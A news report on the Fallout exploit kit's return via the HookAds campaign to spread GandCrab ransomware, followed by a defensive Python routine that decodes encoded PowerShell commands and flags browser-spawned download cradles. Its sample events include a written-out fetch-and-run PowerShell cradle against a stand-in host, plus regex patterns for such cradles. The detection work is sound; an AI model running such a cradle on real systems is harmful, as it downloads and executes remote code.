The Fallout exploit kit, which was used to distribute various prolific malware families last year, has returned with enhanced capabilities. During its absence, the RIG exploit kit was observed launching attack campaigns. A malvertising campaign named HookAds is being used to distribute the latest version of Fallout.
The Fallout exploit kit has been active again since January 15, picking up the pace to deliver the GandCrab ransomware.
Features in the improved Fallout EK
The revised Fallout kit boasts several new features, including the integration of the most recent Flash Player exploit: it is the second EK to add CVE-2018-15982, a bug that allows remote code execution in Flash Player.
The latest version of the EK also adds HTTPS support, a new landing page format, the new Flash exploit (CVE-2018-15982) and the use of PowerShell to run the payload.
“One aspect that caught our attention was how Fallout was delivering its payload via Powershell rather than using iexplore.exe. The Base64 encoded Powershell command calls out the payload URL and loads it in its own way. This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload,” said Jérôme Segura from Malwarebytes.
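The detection angle in that observation, as an added example that is not from the article or from Malwarebytes: a small Python triage routine over constructed process-creation events that decodes -EncodedCommand arguments (base64 of the UTF-16LE script) and flags PowerShell spawned by a browser process with a download cradle. The event field names, the payload.example URL and the two-finding alert threshold are assumptions.

```python
import base64
import re

# Constructed sample data and thresholds (not from the article).
BROWSER_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)

def encode_command(script):
    """powershell.exe -EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand
    (or an accepted abbreviation such as -enc/-ec/-e), otherwise None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if flag and (flag == "ec" or "encodedcommand".startswith(flag)):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):  # not valid base64 / not UTF-16LE
                return None
    return None

def assess_event(event):
    """Score one process-creation event; two or more findings raise an alert."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    result = {"alert": False, "findings": [], "urls": [], "decoded": None}
    if image not in ("powershell.exe", "pwsh.exe"):
        return result
    if parent in BROWSER_PARENTS:
        result["findings"].append(f"powershell spawned by browser process {parent}")
    if re.search(r"-w(?:indowstyle)?\s+hidden", event["cmdline"], re.I):
        result["findings"].append("hidden window requested")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        result["decoded"] = decoded
        result["findings"].append("base64-encoded command")
        result["urls"] = URL_RE.findall(decoded)  # payload URLs recovered from the script
        if CRADLE_RE.search(decoded):
            result["findings"].append("download/execute cradle in decoded script")
    result["alert"] = len(result["findings"]) >= 2
    return result

def scan(events):
    """Return only the alerting events, each with its findings and recovered URLs."""
    return [{"cmdline": e["cmdline"], **v} for e in events if (v := assess_event(e))["alert"]]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed: one browser-spawned cradle, two benign PowerShell launches
    {"parent": r"C:\Program Files\Internet Explorer\iexplore.exe", "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -EncodedCommand "
                + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://payload.example/stage.bin')")},
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell.exe -Command Get-Date"},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmdline": "powershell.exe -enc " + encode_command("Get-Process | Out-Null")},
]
```

Only the first constructed event alerts; an encoded command on its own (third event) is recorded as a single finding, since administrators use -EncodedCommand legitimately.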
The new version of Fallout is still under development. It is believed that many organizations are still running legacy software and unpatched computers, which threat actors can easily abuse to launch attacks.